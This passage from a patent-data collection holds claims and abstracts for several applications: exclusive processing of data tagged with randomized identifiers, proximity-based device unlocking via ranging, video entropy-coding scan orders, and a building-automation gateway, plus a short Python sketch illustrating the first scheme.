The information processing device according to claim 1, wherein, after completion of exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively, the control unit discards the identification information. 7. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit starts exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 8. The information processing device according to claim 1, wherein, when communication data that is not associated with the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the communication data that is not associated with the identification information. 9. The information processing device according to claim 1, wherein, when other identification information that is different from the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the other identification information. 10. The information processing device according to claim 1, wherein
the acquisition unit acquires second identification information that is different from first identification information acquired from the external device as the identification information, and the control unit transmits a result of a process based on the communication data associated with the first identification information to the external device in association with the second identification information. 11. The information processing device according to claim 10, comprising:
a generation unit configured to generate the second identification information based on the first identification information, wherein the acquisition unit acquires the second identification information generated by the generation unit. 12. The information processing device according to claim 10, wherein the acquisition unit acquires the second identification information from the external device that is an acquisition source of the first identification information. 13. The information processing device according to claim 10, wherein, when communication data that is not associated with other first identification information that is different from the first identification information is acquired during exclusive control in which only the communication data associated with the acquired first identification information is set as a processing target exclusively, the control unit notifies the external device that is a transmission source of the communication data of information indicating that the communication data is not set as a processing target in association with the second identification information corresponding to the other first identification information. 14. The information processing device according to claim 1, wherein
the acquisition unit acquires authentication information associated with the identification information from the external device, and when authentication succeeds based on the authentication information, the control unit recognizes a transmission source of the communication data associated with the identification information as a transmission source for which authentication has been performed. 15. The information processing device according to claim 1, wherein
the acquisition unit acquires each of data fragments obtained by dividing the communication data associated with the identification information into the data fragments, and the control unit continues exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively until at least acquisition of the series of data fragments is completed. 16. The information processing device according to claim 15, wherein the control unit recognizes the completion of the acquisition of the series of data fragments based on control information for identifying the data fragments associated with the data fragments. 17. The information processing device according to claim 15, wherein
the acquisition unit acquires control information for identifying the communication data associated with the data fragments, and the control unit recognizes that the data fragments are data fragments constituting the communication data based on the acquired control information for identifying the communication data. 18. The information processing device according to claim 1, comprising:
an informing unit configured to perform informing of a process result based on the communication data associated with the acquired identification information. 19. An information processing device comprising:
a generation unit configured to generate identification information at least a part of which includes randomized information; and a control unit configured to notify an external device of the generated identification information, and transmit communication data to the external device by associating the identification information with the communication data. 20. The information processing device according to claim 19, wherein
based on first identification information generated as the identification information, the generation unit generates second identification information that is different from the first identification information, and the control unit notifies the external device of the generated first identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 21. The information processing device according to claim 19, wherein
the generation unit generates first identification information and second identification information that are different from each other as the identification information, and the control unit notifies the external device of the generated first identification information and second identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 22. An information processing method comprising:
acquiring identification information at least a part of which includes randomized information from an external device; and setting, by a processor, only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 23. An information processing method comprising:
generating identification information at least a part of which includes randomized information; and notifying, by a processor, an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. 24. A program causing a computer to execute:
acquiring identification information at least a part of which includes randomized information from an external device; and setting only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 25. A program causing a computer to execute:
generating identification information at least a part of which includes randomized information; and notifying an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. | 2,400 |
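The exclusive-control scheme claimed above (process only communication data associated with the randomized identification information acquired from one external device, discard everything else, and end exclusive control after an idle period) can be illustrated with a minimal sketch. The class and method names below are hypothetical, chosen only to mirror the claim language; the timeout value and the `upper()` "processing" are stand-ins.

```python
import secrets
import time

class ExclusiveControlDevice:
    """Sketch of the claimed control unit: only communication data associated
    with the acquired identification information is set as a processing target
    exclusively; all other data is discarded."""

    def __init__(self, timeout_s: float = 5.0):
        self.timeout_s = timeout_s   # claim 4: idle period after which exclusive control terminates
        self.active_id = None        # identification information currently honored
        self.last_seen = None

    def acquire_identification(self, identifier: bytes) -> bool:
        # Claim 9: other identification information acquired during
        # exclusive control is discarded.
        if self.active_id is not None and identifier != self.active_id:
            return False
        self.active_id = identifier
        self.last_seen = time.monotonic()
        return True

    def receive(self, identifier: bytes, payload: bytes):
        # Claim 4: terminate exclusive control when no matching communication
        # data has arrived for at least the decided-in-advance period.
        if self.active_id is not None and time.monotonic() - self.last_seen > self.timeout_s:
            self.active_id = None
        # Claim 8: communication data not associated with the acquired
        # identification information is discarded.
        if self.active_id is None or identifier != self.active_id:
            return None
        self.last_seen = time.monotonic()
        return self.process(payload)

    def process(self, payload: bytes) -> bytes:
        return payload.upper()       # stand-in for the real processing

# The counterpart device generates identification information at least a part
# of which is randomized (the claim 19 generation unit).
external_id = secrets.token_bytes(8)
dev = ExclusiveControlDevice()
dev.acquire_identification(external_id)
print(dev.receive(external_id, b"hello"))              # matching data is processed
print(dev.receive(secrets.token_bytes(8), b"other"))   # unassociated data is discarded
```

The randomized identifier is what lets several access sources share a one-to-one medium: each source's data is distinguishable, and the control unit commits to exactly one of them for the duration of the exclusive-control window.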
9,133 | 9,133 | 15,275,203 | 2,436 | Some embodiments of the invention provide a method for a trusted (or originator) device to modify the security state of a target device (e.g., unlocking the device) based on a secure ranging operation (e.g., determining a distance, proximity, etc.). The method of some embodiments exchanges messages as a part of a ranging operation in order to determine whether the trusted and target devices are within a specified range of each other before allowing the trusted device to modify the security state of the target device. In some embodiments, the messages are derived by both devices based on a shared secret and are used to verify the source of ranging signals used for the ranging operation. In some embodiments, the method is performed using multiple different frequency bands. | 1. A method for a first device to modify a security state at a second device, the method comprising:
performing a plurality of ranging operations to compute a plurality of sample distance measurements between the first and second devices; determining whether the plurality of sample distance measurements meets a set of criteria; and when the plurality of sample distance measurements meets the set of criteria, exchanging a security token with the second device to modify the security state at the second device. 2. The method of claim 1, wherein modifying the security state comprises putting the second device into an unlocked state from a locked state. 3. The method of claim 1, wherein modifying the security state comprises authorizing a set of restricted operations to be performed at the second device. 4. The method of claim 1, wherein performing a ranging operation of the plurality of ranging operations comprises:
exchanging codes between the first and second devices; identifying timestamps for the sending and receiving of the codes; and computing a sample distance measurement from the identified timestamps. 5. The method of claim 1 further comprising receiving, from the second device, a request to modify the security state at the second device. 6. The method of claim 5, wherein the second device sends the request upon receiving a user input at the second device. 7. The method of claim 5, wherein the second device sends the request upon detecting that the first device is within a particular distance of the second device. 8. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device when the first device is in an unlocked mode. 9. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device upon receiving a user input at the first device. 10. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating, based on the plurality of sample distance measurements, a confidence level that the first device is within a threshold distance of the second device; and determining that the plurality of sample distance measurements meets the set of criteria when the confidence level exceeds a threshold value. 11. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating a composite distance measurement based on the plurality of sample distance measurements; and determining that the plurality of sample distance measurements meets the set of criteria when the composite distance measurement is within a threshold distance. 12. The method of claim 1, wherein the first device is established as a trusted device through an authorization process with the second device, wherein the first device receives the security token from the second device during the authorization process. 13. The method of claim 1 further comprising establishing a first channel and a different second channel between the first and second devices, wherein the security token is exchanged over the first channel and the plurality of ranging operations are performed over the second channel. 14. The method of claim 13, wherein the first channel is encrypted with a first key and the second channel is encrypted with a different, second key. 15. The method of claim 14, wherein the second key is derived from the first key. 16. The method of claim 13, wherein the first channel uses a first wireless protocol and the second channel uses a different, second wireless protocol. 17. The method of claim 16, wherein the first wireless protocol is a Bluetooth protocol and the second wireless protocol is a Wi-Fi protocol. 18. For a proxy device, a method for establishing a communication connection between a target device and a trusted device, the method comprising:
announcing an availability of the trusted device; in response to the announced availability, receiving a first request from the target device; and upon receiving the first request from the target device, sending a second request to the trusted device, wherein the trusted device establishes the communication connection based on the second request. 19. The method of claim 18, wherein the communication connection between the target device and the trusted device is for exchanging ranging information to determine whether the target device and the trusted device are within a particular range prior to exchanging authorization information to modify a security state of the target device. 20. The method of claim 18, wherein the proxy device announces the availability of the trusted device using a first wireless protocol and the communication connection established between the target device and the trusted device uses a different, second wireless protocol. 21. The method of claim 20, wherein the second request to the trusted device comprises a request for the trusted device to announce its availability to the target device. 22. The method of claim 20, wherein the proxy device maintains a connection with the trusted device using the first wireless protocol. 23. The method of claim 18, wherein announcing the availability comprises broadcasting an identifier for the target device. 24. A non-transitory machine readable medium storing a program which when executed by a set of processing units of a target device establishes a communication connection between the target device and a trusted device, the program comprising sets of instructions for:
scanning for availability of a trusted device; based on the scan, identifying a particular trusted device; sending a request for the particular trusted device to a proxy device that sends a request to the particular trusted device; and establishing a communication connection with the particular trusted device. 25. The non-transitory machine readable medium of claim 24, wherein the sets of instructions for scanning, sending, and exchanging are performed using a first wireless protocol, wherein the communication connection is established to use a different, second wireless protocol. 26. The non-transitory machine readable medium of claim 24, wherein upon receiving the request, the proxy device instructs the particular trusted device to initiate a broadcast of its availability. 27. The non-transitory machine readable medium of claim 24, wherein the proxy device is in a locked state and the trusted device is in an unlocked state. 28. The non-transitory machine readable medium of claim 24, wherein the set of instructions for establishing the communication connection comprises a set of instructions for exchanging bootstrap information with the particular trusted device, wherein the bootstrap information identifies a portion of a frequency spectrum for the communication connection. 29. The non-transitory machine readable medium of claim 24, wherein the program further comprises sets of instructions for:
receiving input to initiate a change in security state at the target device; using the established communication connection to perform a set of ranging operations to allow the target device to receive a set of authentication information; and using the set of authentication information to change the security state at the target device. 30. The non-transitory machine readable medium of claim 29, wherein the change in security state moves the target device from a locked state to an unlocked state. 31. The non-transitory machine readable medium of claim 24, wherein the target device is allowed to receive the set of authentication information when the trusted device is determined to be within a particular threshold distance based on the set of ranging operations. 32. The non-transitory machine readable medium of claim 24, wherein the trusted device sends the set of authentication information when the target device is determined to be within a particular threshold distance based on the set of ranging operations. | Some embodiments of the invention provide a method for a trusted (or originator) device to modify the security state of a target device (e.g., unlocking the device) based on a secure ranging operation (e.g., determining a distance, proximity, etc.). The method of some embodiments exchanges messages as a part of a ranging operation in order to determine whether the trusted and target devices are within a specified range of each other before allowing the trusted device to modify the security state of the target device. In some embodiments, the messages are derived by both devices based on a shared secret and are used to verify the source of ranging signals used for the ranging operation. In some embodiments, the method is performed using multiple different frequency bands. 1. A method for a first device to modify a security state at a second device, the method comprising:
performing a plurality of ranging operations to compute a plurality of sample distance measurements between the first and second devices; determining whether the plurality of sample distance measurements meets a set of criteria; and when the plurality of sample distance measurements meets the set of criteria, exchanging a security token with the second device to modify the security state at the second device. 2. The method of claim 1, wherein modifying the security state comprises putting the second device into an unlocked state from a locked state. 3. The method of claim 1, wherein modifying the security state comprises authorizing a set of restricted operations to be performed at the second device. 4. The method of claim 1, wherein performing a ranging operation of the plurality of ranging operations comprises:
exchanging codes between the first and second devices; identifying timestamps for the sending and receiving of the codes; and computing a sample distance measurement from the identified timestamps. 5. The method of claim 1 further comprising receiving, from the second device, a request to modify the security state at the second device. 6. The method of claim 5, wherein the second device sends the request upon receiving a user input at the second device. 7. The method of claim 5, wherein the second device sends the request upon detecting that the first device is within a particular distance of the second device. 8. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device when the first device is in an unlocked mode. 9. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device upon receiving a user input at the first device. 10. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating, based on the plurality of sample distance measurements, a confidence level that the first device is within a threshold distance of the second device; and determining that the plurality of sample distance measurements meets the set of criteria when the confidence level exceeds a threshold value. 11. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating a composite distance measurement based on the plurality of sample distance measurements; and determining that the plurality of sample distance measurements meets the set of criteria when the composite distance measurement is within a threshold distance. 12. The method of claim 1, wherein the first device is established as a trusted device through an authorization process with the second device, wherein the first device receives the security token from the second device during the authorization process. 13. The method of claim 1 further comprising establishing a first channel and a different second channel between the first and second devices, wherein the security token is exchanged over the first channel and the plurality of ranging operations are performed over the second channel. 14. The method of claim 13, wherein the first channel is encrypted with a first key and the second channel is encrypted with a different, second key. 15. The method of claim 14, wherein the second key is derived from the first key. 16. The method of claim 13, wherein the first channel uses a first wireless protocol and the second channel uses a different, second wireless protocol. 17. The method of claim 16, wherein the first wireless protocol is a Bluetooth protocol and the second wireless protocol is a Wi-Fi protocol. 18. For a proxy device, a method for establishing a communication connection between a target device and a trusted device, the method comprising:
announcing an availability of the trusted device; in response to the announced availability, receiving a first request from the target device; and upon receiving the first request from the target device, sending a second request to the trusted device, wherein the trusted device establishes the communication connection based on the second request. 19. The method of claim 18, wherein the communication connection between the target device and the trusted device is for exchanging ranging information to determine whether the target device and the trusted device are within a particular range prior to exchanging authorization information to modify a security state of the target device. 20. The method of claim 18, wherein the proxy device announces the availability of the trusted device using a first wireless protocol and the communication connection established between the target device and the trusted device uses a different, second wireless protocol. 21. The method of claim 20, wherein the second request to the trusted device comprises a request for the trusted device to announce its availability to the target device. 22. The method of claim 20, wherein the proxy device maintains a connection with the trusted device using the first wireless protocol. 23. The method of claim 18, wherein announcing the availability comprises broadcasting an identifier for the target device. 24. A non-transitory machine readable medium storing a program which when executed by a set of processing units of a target device establishes a communication connection between the target device and a trusted device, the program comprising sets of instructions for:
scanning for availability of a trusted device; based on the scan, identifying a particular trusted device; sending a request for the particular trusted device to a proxy device that sends a request to the particular trusted device; and establishing a communication connection with the particular trusted device. 25. The non-transitory machine readable medium of claim 24, wherein the sets of instructions for scanning, sending, and exchanging are performed using a first wireless protocol, wherein the communication connection is established to use a different, second wireless protocol. 26. The non-transitory machine readable medium of claim 24, wherein upon receiving the request, the proxy device instructs the particular trusted device to initiate a broadcast of its availability. 27. The non-transitory machine readable medium of claim 24, wherein the proxy device is in a locked state and the trusted device is in an unlocked state. 28. The non-transitory machine readable medium of claim 24, wherein the set of instructions for establishing the communication connection comprises a set of instructions for exchanging bootstrap information with the particular trusted device, wherein the bootstrap information identifies a portion of a frequency spectrum for the communication connection. 29. The non-transitory machine readable medium of claim 24, wherein the program further comprises sets of instructions for:
receiving input to initiate a change in security state at the target device; using the established communication connection to perform a set of ranging operations to allow the target device to receive a set of authentication information; and using the set of authentication information to change the security state at the target device. 30. The non-transitory machine readable medium of claim 29, wherein the change in security state moves the target device from a locked state to an unlocked state. 31. The non-transitory machine readable medium of claim 24, wherein the target device is allowed to receive the set of authentication information when the trusted device is determined to be within a particular threshold distance based on the set of ranging operations. 32. The non-transitory machine readable medium of claim 24, wherein the trusted device sends the set of authentication information when the target device is determined to be within a particular threshold distance based on the set of ranging operations. | 2,400 |
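The ranging claims above (claims 4, 10, and 11) describe computing sample distance measurements from the timestamps of exchanged codes, then gating the security-state change on either a confidence level or a composite distance against a threshold. A minimal sketch of that logic follows; the function names, the reply-delay handling, and the 0.8 confidence default are illustrative assumptions, not anything the patent specifies.

```python
# Hypothetical sketch of the ranging logic in claims 4, 10, and 11:
# derive a one-way distance from a send/receive timestamp pair, then
# accept the measurement set when enough samples fall inside a
# threshold distance. All names and defaults are assumptions.

SPEED_OF_LIGHT_M_PER_S = 299_792_458.0

def sample_distance(t_sent: float, t_received: float,
                    reply_delay: float = 0.0) -> float:
    """Estimate one-way distance (meters) from a round-trip timestamp pair."""
    time_of_flight = ((t_received - t_sent) - reply_delay) / 2.0
    return time_of_flight * SPEED_OF_LIGHT_M_PER_S

def meets_criteria(samples: list[float], threshold_m: float,
                   min_confidence: float = 0.8) -> bool:
    """Claim-10-style check: treat the fraction of in-range samples
    as a confidence level and require it to exceed a threshold value."""
    if not samples:
        return False
    confidence = sum(1 for d in samples if d <= threshold_m) / len(samples)
    return confidence > min_confidence
```

A claim-11-style variant would instead reduce the samples to one composite distance (for example, a median) and compare that single value to the threshold.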
9,134 | 9,134 | 15,671,595 | 2,485 | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. | 1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
decode, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 4. The system of claim 1, wherein a shape of the first group is selected based on a size of the block. 5. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and enable use of the second scan order based on the parity of the sum. 6. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; decode, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determine the second scan order based on the scan order prediction and the scan order adjustment parameter. 7. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. 8. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first sum and the second sum. 9. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 10. The method of claim 9, wherein the elements of the block are quantized transform coefficients. 11. The method of claim 9, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 12. The method of claim 9, comprising:
determining a sum of magnitudes of all the elements of the first group; checking a parity of the sum; and enabling use of the second scan order based on the parity of the sum. 13. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a scan order prediction based on the elements of the first group; decoding, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determining the second scan order based on the scan order prediction and the scan order adjustment parameter. 14. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first count and the second count. 15. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first sum and the second sum. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the second scan order, elements of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 18. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and adjust an element of the first group to change the parity of the sum to signal that use of the second scan order is enabled. 19. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; and encode, using the entropy encoder, a scan order adjustment parameter that is based on the second scan order and the scan order prediction. 20. The system of claim 16, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements.1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
decode, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 4. The system of claim 1, wherein a shape of the first group is selected based on a size of the block. 5. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and enable use of the second scan order based on the parity of the sum. 6. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; decode, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determine the second scan order based on the scan order prediction and the scan order adjustment parameter. 7. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. 8. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first sum and the second sum. 9. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 10. The method of claim 9, wherein the elements of the block are quantized transform coefficients. 11. The method of claim 9, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 12. The method of claim 9, comprising:
determining a sum of magnitudes of all the elements of the first group; checking a parity of the sum; and enabling use of the second scan order based on the parity of the sum. 13. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a scan order prediction based on the elements of the first group; decoding, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determining the second scan order based on the scan order prediction and the scan order adjustment parameter. 14. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first count and the second count. 15. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first sum and the second sum. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the second scan order, elements of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 18. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and adjust an element of the first group to change the parity of the sum to signal that use of the second scan order is enabled. 19. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; and encode, using the entropy encoder, a scan order adjustment parameter that is based on the second scan order and the scan order prediction. 20. The system of claim 16, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. | 2,400 |
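Claims 5/12/18 and 7/14/20 of the application above describe two mechanisms: parity-based signalling over the corner-triangle group, and a second-group scan-order decision driven by counts of non-zero triangle elements below versus above the main diagonal. The sketch below is a hypothetical reading of those claims, assuming a square block, a top-left triangle bounded by the anti-diagonal, and a row/column naming and tie-break rule the patent does not specify.

```python
# Hypothetical sketch of the scan-order decision (claims 7/14/20) and the
# parity signal (claims 5/12/18). Element positions with r + c <= n - 1
# are taken as the corner triangle "at or above the anti-diagonal".

def second_scan_order(block: list[list[int]]) -> str:
    """Pick a scan order for the second group from the first-group triangle."""
    n = len(block)
    below = above = 0
    for r in range(n):
        for c in range(n):
            if r + c >= n:        # outside the triangle (below the anti-diagonal)
                continue
            if block[r][c] == 0:  # only non-zero elements are counted
                continue
            if r > c:             # below the main diagonal
                below += 1
            elif r < c:           # above the main diagonal
                above += 1
    # Assumed rule: more energy below the main diagonal suggests a
    # column-dominant coefficient layout; ties default to row-first.
    return "column-first" if below > above else "row-first"

def parity_enables_second_order(triangle_values: list[int]) -> bool:
    """Claim-5-style signal: odd sum of magnitudes enables the second order."""
    return sum(abs(v) for v in triangle_values) % 2 == 1
```

On the encoder side (claim 18), the same parity would be *written* rather than read: one triangle element is nudged so the magnitude sum's parity signals that the second scan order is in use.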
9,135 | 9,135 | 15,983,144 | 2,444 | A method for managing communication with a building automation device, the method being performed in a gateway, the method including the steps of: establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol. | 1. A method for managing communication with a building automation device, the method being performed in a gateway and comprising the steps of:
establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol. 2. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 3. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 4. The method according to claim 1, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6LoWPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 5. The method according to claim 1, wherein the second communication protocol comprises a later revision of the first communication protocol. 6. A gateway for managing communication with a building automation device, the gateway comprising:
